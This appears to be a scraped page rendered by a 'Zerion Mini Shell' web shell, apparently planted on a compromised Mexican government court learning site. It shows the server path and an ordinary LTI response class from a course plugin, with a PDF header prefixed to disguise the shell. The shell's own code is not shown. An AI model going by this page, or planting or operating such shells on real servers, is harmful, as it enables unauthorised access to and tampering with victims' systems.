%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/tjamichg/cursos.tjamich.gob.mx/plugin/ims_lti/src/
Upload File :
Create Path :
Current File : /home/tjamichg/cursos.tjamich.gob.mx/plugin/ims_lti/src/ImsLtiServiceUnsupportedResponse.php

<?php
/* For licensing terms, see /license.txt */

/**
 * Class ImsLtiServiceUnsupportedResponse.
 */
class ImsLtiServiceUnsupportedResponse extends ImsLtiServiceResponse
{
    /**
     * ImsLtiServiceUnsupportedResponse constructor.
     *
     * @param string $type
     */
    public function __construct(ImsLtiServiceResponseStatus $statusInfo, $type)
    {
        $statusInfo->setOperationRefIdentifier($type);

        parent::__construct($statusInfo);
    }

    protected function generateBody(SimpleXMLElement $xmlBody)
    {
    }
}

Zerion Mini Shell 1.0